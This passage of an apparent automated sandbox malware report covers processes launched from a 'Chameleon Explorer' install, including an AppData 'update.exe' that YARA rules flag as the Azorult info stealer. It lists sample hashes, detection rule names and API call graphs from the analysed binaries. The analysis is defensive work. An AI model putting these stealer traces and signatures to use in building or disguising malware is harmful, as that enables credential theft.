                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:20:27:20
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276
                                                                                                          Imagebase:0x400000
                                                                                                          File size:146'536 bytes
                                                                                                          MD5 hash:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:15
                                                                                                          Start time:20:27:27
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:20:27:30
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:20:27:30
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:20:27:36
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:20:27:36
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:20:27:44
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:15'091'304 bytes
                                                                                                          MD5 hash:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:21
                                                                                                          Start time:20:27:47
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\update.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline: C:\Users\user\AppData\Roaming\update.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:700'768 bytes
                                                                                                          MD5 hash:912B031EAEE45A05000F7DE4E9B734BC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Azorult_1, Description: Azorult Payload, Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                          • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:20:27:53
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Target ID:23
                                                                                                          Start time:20:27:53
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:4'644'456 bytes
                                                                                                          MD5 hash:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Has exited:true

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:21%
                                                                                                            Total number of Nodes:167
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 490 3e1cbf 491 3e1ccf 490->491 494 3e1ce7 491->494 495 400ff6 491->495 493 41bd01 498 400ffe 495->498 497 401018 497->493 498->497 500 40101c std::exception::exception 498->500 503 40594c 498->503 520 4035e1 DecodePointer 498->520 522 4087db 500->522 502 401046 502->493 504 4059c7 503->504 513 405958 503->513 505 4035e1 _malloc DecodePointer 504->505 506 4059cd 505->506 507 408d68 _malloc 6 API calls 506->507 510 4059bf 507->510 509 40598b RtlAllocateHeap 509->510 509->513 510->498 512 4059b3 567 408d68 512->567 513->509 513->512 514 4035e1 _malloc DecodePointer 513->514 517 4059b1 513->517 525 40a3ab 513->525 534 4032df 513->534 537 40a408 513->537 514->513 519 408d68 _malloc 6 API calls 517->519 519->510 521 4035f4 520->521 521->498 524 4087fa RaiseException 522->524 524->502 570 415097 525->570 527 40a3b2 528 415097 __NMSG_WRITE 15 API calls 527->528 531 40a3bf 527->531 528->531 529 40a408 __NMSG_WRITE 40 API calls 530 40a3d7 529->530 532 40a408 __NMSG_WRITE 40 API calls 530->532 531->529 533 40a3e1 531->533 532->533 533->513 614 4032ab GetModuleHandleExW 534->614 538 40a426 __NMSG_WRITE 537->538 539 40a54d 538->539 540 415097 __NMSG_WRITE 15 API calls 538->540 541 40c836 ___crtMessageBoxW 6 API calls 539->541 542 40a439 540->542 543 40a5b6 541->543 544 40a552 GetStdHandle 542->544 545 415097 __NMSG_WRITE 15 API calls 542->545 543->513 544->539 548 40a560 _strlen 544->548 546 40a44a 545->546 546->544 547 40a45c 546->547 547->539 618 414857 547->618 548->539 550 40a599 WriteFile 548->550 550->539 552 40a489 GetModuleFileNameW 555 40a4a9 552->555 557 40a4b9 __NMSG_WRITE 552->557 553 40a5ba 554 409006 __invoke_watson 8 API calls 553->554 559 40a5c4 554->559 556 414857 __NMSG_WRITE 15 API calls 555->556 556->557 557->553 558 40a4ff 557->558 627 40d388 557->627 558->553 636 415c41 558->636 559->513 563 415c41 __NMSG_WRITE 15 API calls 564 40a536 563->564 564->553 565 40a53d 564->565 645 415ccc EncodePointer 565->645 670 409c04 GetLastError 567->670 569 408d6d 569->517 571 4150a1 570->571 572 408d68 _malloc 6 API calls 571->572 573 4150ab 571->573 574 4150c7 572->574 573->527 577 408ff6 574->577 580 408fcb DecodePointer 577->580 581 408fde 580->581 586 409006 IsProcessorFeaturePresent 581->586 584 408fcb __NMSG_WRITE 8 API calls 585 409002 584->585 585->527 587 409011 586->587 592 408e99 587->592 591 408ff5 591->584 593 408eb3 ___raise_securityfailure __call_reportfault 592->593 594 408ed3 IsDebuggerPresent 593->594 600 40a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 594->600 597 408f97 ___raise_securityfailure 601 40c836 597->601 598 408fba 599 40a380 GetCurrentProcess TerminateProcess 598->599 599->591 600->597 602 40c840 IsProcessorFeaturePresent 601->602 603 40c83e 601->603 605 415b5a 602->605 603->598 608 415b09 IsDebuggerPresent 605->608 609 415b1e ___raise_securityfailure 608->609 610 40a395 ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 609->610 611 415b26 ___raise_securityfailure 610->611 612 40a380 ___raise_securityfailure GetCurrentProcess TerminateProcess 611->612 613 415b43 612->613 613->598 615 4032c4 GetProcAddress 614->615 616 4032db ExitProcess 614->616 615->616 617 4032d6 615->617 617->616 619 414862 618->619 621 414870 618->621 619->621 624 414889 619->624 620 408d68 _malloc 6 API calls 622 41487a 620->622 621->620 623 408ff6 __NMSG_WRITE 9 API calls 622->623 625 40a47c 623->625 624->625 626 408d68 _malloc 6 API calls 624->626 625->552 625->553 626->622 631 40d396 627->631 628 40d39a 629 40d39f 628->629 630 408d68 _malloc 6 API calls 628->630 629->558 632 40d3ca 630->632 631->628 631->629 634 40d3d9 631->634 633 408ff6 __NMSG_WRITE 9 API calls 632->633 633->629 634->629 635 408d68 _malloc 6 API calls 634->635 635->632 637 415c5b 636->637 639 415c4d 636->639 638 408d68 _malloc 6 API calls 637->638 644 415c65 638->644 639->637 642 415c87 639->642 640 408ff6 __NMSG_WRITE 9 API calls 641 40a51f 640->641 641->553 641->563 642->641 643 408d68 _malloc 6 API calls 642->643 643->644 644->640 646 415d00 ___crtIsPackagedApp 645->646 647 415dbf IsDebuggerPresent 646->647 648 415d0f LoadLibraryExW 646->648 649 415de4 647->649 650 415dc9 647->650 651 415d26 GetLastError 648->651 652 415d4c GetProcAddress 648->652 654 415dd7 649->654 655 415de9 DecodePointer 649->655 653 415dd0 OutputDebugStringW 650->653 650->654 656 415d35 LoadLibraryExW 651->656 658 415ddc 651->658 657 415d60 7 API calls 652->657 652->658 653->654 654->658 663 415e10 DecodePointer DecodePointer 654->663 669 415e28 654->669 655->658 656->652 656->658 659 415da8 GetProcAddress EncodePointer 657->659 660 415dbc 657->660 661 40c836 ___crtMessageBoxW 6 API calls 658->661 659->660 660->647 664 415eae 661->664 662 415e60 DecodePointer 666 415e67 662->666 668 415e4c DecodePointer 662->668 663->669 664->539 667 415e78 DecodePointer 666->667 666->668 667->668 668->658 669->662 669->668 680 40a007 670->680 672 409c19 673 409c67 SetLastError 672->673 683 408a15 672->683 673->569 677 409c40 __initptd 678 409c5e __getptd_noexit 677->678 679 409c4e GetCurrentThreadId 677->679 678->673 679->673 681 40a01e TlsGetValue 680->681 682 40a01a 680->682 681->672 682->672 686 408a1c 683->686 684 408a57 684->673 687 40a026 684->687 686->684 690 40a372 Sleep 686->690 688 40a040 TlsSetValue 687->688 689 40a03c 687->689 688->677 689->677 690->686 691 40800a 694 4150d7 691->694 693 40800f 693->693 695 415107 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 694->695 696 4150fa 694->696 697 4150fe 695->697 696->695 696->697 697->693

                                                                                                            Callgraph

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040594C: __FF_MSGBANNER.LIBCMT ref: 00405963
                                                                                                              • Part of subcall function 0040594C: __NMSG_WRITE.LIBCMT ref: 0040596A
                                                                                                              • Part of subcall function 0040594C: RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,?,?,?,00401013,?), ref: 0040598F
                                                                                                            • std::exception::exception.LIBCMT ref: 0040102C
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00401041
                                                                                                              • Part of subcall function 004087DB: RaiseException.KERNEL32(?,?,?,0049BAF8,00000000,?,?,?,?,00401046,?,0049BAF8,?,00000001), ref: 00408830
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                            • String ID: 9I
                                                                                                            • API String ID: 3902256705-3853901842
                                                                                                            • Opcode ID: c9d396497a545f0b994946cb6a19f0fa4b416b31df0d7e9fefe9fe323cb7b39c
                                                                                                            • Instruction ID: c31501622222a32f1cc2e59b1f1168e3eda5d1aefb4f8aaef276fead88a914f0
                                                                                                            • Opcode Fuzzy Hash: c9d396497a545f0b994946cb6a19f0fa4b416b31df0d7e9fefe9fe323cb7b39c
                                                                                                            • Instruction Fuzzy Hash: 95F0F934500319A6CB20AA59EE019DF7BACDF00354F10443FF888B26E1DFB98A8096DD

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 19 4032df-4032ee call 4032ab ExitProcess
                                                                                                            APIs
                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 004032E5
                                                                                                              • Part of subcall function 004032AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,004032EA,00401013,?,00405979,000000FF,0000001E,00000000,?,?,?,00401013), ref: 004032BA
                                                                                                              • Part of subcall function 004032AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 004032CC
                                                                                                            • ExitProcess.KERNEL32 ref: 004032EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2427264223-0
                                                                                                            • Opcode ID: 8b4f6869848d75a34372ea26b092661cfb6a1057c36efb8000ea47b45e7879e4
                                                                                                            • Instruction ID: 4b4b8896e93eb86cbaf3263f340f39ca76a21130d1afdfd58e71558c83f5ac6d
                                                                                                            • Opcode Fuzzy Hash: 8b4f6869848d75a34372ea26b092661cfb6a1057c36efb8000ea47b45e7879e4
                                                                                                            • Instruction Fuzzy Hash: 2DB09230004208BBCB012F12EC0A8483F29FF01A91B004039F80408171EBB6AAD2DA89

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00408F97,?,?,?,00000000), ref: 0040A39A
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 0040A3A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1784083675.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1784055817.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784162304.0000000000495000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784283159.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1784335181.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_3e0000_ETVk1yP43q.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: b622a3df41f8a94f907b7d33d2849a3184b935e67241c561310d77cf32ab1c79
                                                                                                            • Instruction ID: 246f8a8197968ac254506115b5e3a4c1b5c43bbea20d895d4fddf0fa4c866c33
                                                                                                            • Opcode Fuzzy Hash: b622a3df41f8a94f907b7d33d2849a3184b935e67241c561310d77cf32ab1c79
                                                                                                            • Instruction Fuzzy Hash: 23B09231058208ABCA002B91FC09B883F68EB44AA2F404030FA4D84E60FBA254948A9A

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:8.6%
                                                                                                            Total number of Nodes:327
                                                                                                            Total number of Limit Nodes:34
                                                                                                            execution_graph 27201 35e988c 27202 35e989a CallNextHookEx 27201->27202 27203 35e98b2 27201->27203 27204 35e98fb 27202->27204 27205 35e98dc CallNextHookEx 27203->27205 27206 35e98bd PostMessageW 27203->27206 27205->27204 27206->27205 27207 35f07ec 27214 355b248 27207->27214 27215 355b253 27214->27215 27232 3556e48 27215->27232 27217 355b293 27218 35e9b9c 27217->27218 27219 35e9c3f 27218->27219 27220 35e9bac 27218->27220 27222 35e9c49 UnmapViewOfFile 27219->27222 27223 35e9c56 27219->27223 27221 35e9bb2 CreateFileMappingW 27220->27221 27230 35e9bd8 27220->27230 27224 35e9be6 GetLastError MapViewOfFile 27221->27224 27221->27230 27222->27223 27225 35e9c6d 27223->27225 27226 35e9c60 CloseHandle 27223->27226 27229 35e9c17 27224->27229 27331 35e7348 DestroyWindow 27225->27331 27226->27225 27327 35e7328 27229->27327 27231 355718c 11 API calls 27230->27231 27233 3556e57 27232->27233 27234 3556e5c GetCurrentThreadId 27232->27234 27233->27234 27235 3556e92 27234->27235 27236 3556f0a 27235->27236 27249 3556ddc 27235->27249 27236->27217 27237 35571af 27236->27237 27238 355719e 27236->27238 27240 35571b8 GetCurrentThreadId 27237->27240 27243 35571c5 27237->27243 27253 35570f4 GetStdHandle WriteFile GetStdHandle WriteFile 27238->27253 27240->27243 27242 35571a8 27242->27237 27244 3555068 11 API calls 27243->27244 27245 3557269 FreeLibrary 27243->27245 27246 3557291 27243->27246 27244->27243 27245->27243 27247 35572a0 ExitProcess 27246->27247 27248 355729a 27246->27248 27248->27247 27250 3556e24 27249->27250 27251 3556dec 27249->27251 27250->27236 27251->27250 27254 35f0434 27251->27254 27253->27242 27255 35f044e 27254->27255 27256 35f04bc 27254->27256 27268 3556fc8 27255->27268 27256->27251 27258 35f0458 27260 35f047a 27258->27260 27289 3557844 11 API calls 27258->27289 27274 356c708 GetVersionExW 27260->27274 27262 35f048e 27276 356d21c GetModuleHandleW 27262->27276 27266 35f049f 27290 356cd34 93 API calls 27266->27290 27269 3556fd4 27268->27269 27273 3557005 27269->27273 27291 3556f10 57 API calls 27269->27291 27292 3556f64 57 API calls 27269->27292 27293 3556fb4 57 API calls 27269->27293 27273->27258 27275 356c73d 27274->27275 27275->27262 27277 356d23d 27276->27277 27278 356d22d 27276->27278 27281 355a444 27277->27281 27294 355c13c 13 API calls 27278->27294 27280 356d238 27280->27277 27282 355a466 27281->27282 27285 355a478 27281->27285 27295 355a128 27282->27295 27284 355a470 27323 355a4a8 11 API calls 27284->27323 27319 3557464 27285->27319 27289->27260 27290->27256 27291->27269 27292->27269 27293->27269 27294->27280 27296 355a13f 27295->27296 27297 355a153 GetModuleFileNameW 27296->27297 27298 355a168 27296->27298 27297->27298 27299 355a337 27298->27299 27300 355a190 RegOpenKeyExW 27298->27300 27303 3557464 11 API calls 27299->27303 27301 355a1b7 RegOpenKeyExW 27300->27301 27302 355a251 27300->27302 27301->27302 27305 355a1d5 RegOpenKeyExW 27301->27305 27324 3559f38 7 API calls 27302->27324 27307 355a34c 27303->27307 27305->27302 27306 355a1f3 RegOpenKeyExW 27305->27306 27306->27302 27309 355a211 RegOpenKeyExW 27306->27309 27307->27284 27308 355a26f RegQueryValueExW 27310 355a2c0 RegQueryValueExW 27308->27310 27311 355a28d 27308->27311 27309->27302 27312 355a22f RegOpenKeyExW 27309->27312 27313 355a2dc 27310->27313 27314 355a2be 27310->27314 27315 355a295 RegQueryValueExW 27311->27315 27312->27299 27312->27302 27317 355a2e4 RegQueryValueExW 27313->27317 27316 355a326 RegCloseKey 27314->27316 27325 3554fe0 11 API calls 27314->27325 27315->27314 27316->27284 27317->27314 27320 3557485 27319->27320 27321 355746a 27319->27321 27320->27266 27321->27320 27326 3554fe0 11 API calls 27321->27326 27323->27285 27324->27308 27325->27316 27326->27320 27328 35e7347 27327->27328 27329 35e7332 27327->27329 27328->27230 27329->27328 27332 35e6de8 27329->27332 27331->27230 27333 35e6e1a GetCurrentProcessId 27332->27333 27334 35e6ff3 27332->27334 27361 3566a88 27333->27361 27383 35574c4 27334->27383 27339 3557464 11 API calls 27341 35e7015 27339->27341 27341->27328 27342 35e6e49 27343 35e6e7b RegisterClassExW 27342->27343 27344 35e6ebc 27343->27344 27379 355c400 27344->27379 27346 35e6eca RegisterWindowMessageW 27347 355c310 27346->27347 27348 35e6eeb RegisterWindowMessageW 27347->27348 27349 355c310 27348->27349 27350 35e6f07 RegisterWindowMessageW 27349->27350 27351 355c310 27350->27351 27352 35e6f23 RegisterWindowMessageW 27351->27352 27353 355c310 27352->27353 27354 35e6f3f RegisterWindowMessageW 27353->27354 27355 355c310 27354->27355 27356 35e6f5b RegisterWindowMessageW 27355->27356 27357 355c310 27356->27357 27358 35e6f77 RegisterWindowMessageW 27357->27358 27359 355c310 27358->27359 27360 35e6f93 LoadLibraryW 27359->27360 27360->27334 27362 3566a94 27361->27362 27363 3566a9a 27362->27363 27364 3566ab8 27362->27364 27387 3566750 11 API calls 27363->27387 27388 3566750 11 API calls 27364->27388 27367 3566ab6 27368 35581d4 27367->27368 27369 3558246 27368->27369 27370 35581d8 27368->27370 27371 35581e0 27370->27371 27374 3557844 27370->27374 27371->27369 27376 35581ef 27371->27376 27390 3557844 11 API calls 27371->27390 27372 3557888 27372->27342 27374->27372 27389 3554fe0 11 API calls 27374->27389 27376->27369 27391 3557844 11 API calls 27376->27391 27378 3558242 27378->27342 27392 3555278 27379->27392 27381 355c413 CreateWindowExW 27382 355c44d 27381->27382 27382->27346 27385 35574ca 27383->27385 27384 35574f0 27384->27339 27385->27384 27393 3554fe0 11 API calls 27385->27393 27387->27367 27388->27367 27389->27372 27390->27376 27391->27378 27392->27381 27393->27385 27394 355aff0 GetSystemInfo 27395 356c760 27410 355788c 27395->27410 27399 356c798 27400 356c7a4 GetFileVersionInfoSizeW 27399->27400 27401 356c84a 27400->27401 27404 356c7b4 27400->27404 27402 3557464 11 API calls 27401->27402 27403 356c85f 27402->27403 27405 356c7dd GetFileVersionInfoW 27404->27405 27406 356c7e7 VerQueryValueW 27405->27406 27407 356c801 27405->27407 27406->27407 27418 3554fe0 11 API calls 27407->27418 27409 356c842 27412 3557890 27410->27412 27411 35578b4 27414 35579e4 27411->27414 27412->27411 27419 3554fe0 11 API calls 27412->27419 27416 355795c 27414->27416 27415 3557997 27415->27399 27416->27415 27420 3554fe0 11 API calls 27416->27420 27418->27409 27419->27411 27420->27415 27421 35595fc 27422 3559621 27421->27422 27423 355960b 27421->27423 27423->27422 27425 35595b4 27423->27425 27426 35595c4 GetModuleFileNameW 27425->27426 27427 35595e0 27425->27427 27429 355a82c GetModuleFileNameW 27426->27429 27427->27422 27430 355a87a 27429->27430 27439 355a708 27430->27439 27432 355a8a6 27433 355a8c0 27432->27433 27434 355a8b8 LoadLibraryExW 27432->27434 27435 35574c4 11 API calls 27433->27435 27434->27433 27436 355a8dd 27435->27436 27437 3557464 11 API calls 27436->27437 27438 355a8e5 27437->27438 27438->27427 27440 355a729 27439->27440 27441 3557464 11 API calls 27440->27441 27442 355a746 27441->27442 27443 355a7b1 27442->27443 27444 355788c 11 API calls 27442->27444 27445 35574c4 11 API calls 27443->27445 27448 355a75b 27444->27448 27446 355a81e 27445->27446 27446->27432 27447 355a78c 27449 355a444 30 API calls 27447->27449 27448->27447 27520 3558344 27448->27520 27451 355a79e 27449->27451 27452 355a7a4 27451->27452 27453 355a7b3 GetUserDefaultUILanguage 27451->27453 27454 355a570 13 API calls 27452->27454 27465 3559df4 EnterCriticalSection 27453->27465 27454->27443 27459 355a7f5 27459->27443 27502 355a63c 27459->27502 27460 355a7db GetSystemDefaultUILanguage 27461 3559df4 28 API calls 27460->27461 27463 355a7e8 27461->27463 27464 355a570 13 API calls 27463->27464 27464->27459 27466 3559e40 LeaveCriticalSection 27465->27466 27467 3559e20 27465->27467 27468 3557464 11 API calls 27466->27468 27469 3559e31 LeaveCriticalSection 27467->27469 27470 3559e51 IsValidLocale 27468->27470 27473 3559ee2 27469->27473 27471 3559e60 27470->27471 27472 3559eaf EnterCriticalSection 27470->27472 27474 3559e74 27471->27474 27475 3559e69 27471->27475 27476 3559ec7 27472->27476 27479 3557464 11 API calls 27473->27479 27525 3559adc 14 API calls 27474->27525 27524 3559cd8 17 API calls 27475->27524 27483 3559ed8 LeaveCriticalSection 27476->27483 27482 3559ef7 27479->27482 27480 3559e72 27480->27472 27481 3559e7d GetSystemDefaultUILanguage 27481->27472 27484 3559e87 27481->27484 27490 355a570 27482->27490 27483->27473 27485 3559e98 GetSystemDefaultUILanguage 27484->27485 27526 3557844 11 API calls 27484->27526 27527 3559adc 14 API calls 27485->27527 27488 3559ea5 27528 3557844 11 API calls 27488->27528 27491 355a58e 27490->27491 27492 3557464 11 API calls 27491->27492 27493 355a5ab 27492->27493 27494 355a609 27493->27494 27496 355a610 27493->27496 27499 3558344 11 API calls 27493->27499 27500 35581d4 11 API calls 27493->27500 27529 355a504 27493->27529 27495 3557464 11 API calls 27494->27495 27495->27496 27497 35574c4 11 API calls 27496->27497 27498 355a62a 27497->27498 27498->27459 27498->27460 27499->27493 27500->27493 27536 3557548 27502->27536 27505 355a68c 27506 35581d4 11 API calls 27505->27506 27507 355a699 27506->27507 27508 355a504 13 API calls 27507->27508 27510 355a6a0 27508->27510 27509 355a6d9 27511 35574c4 11 API calls 27509->27511 27510->27509 27512 35581d4 11 API calls 27510->27512 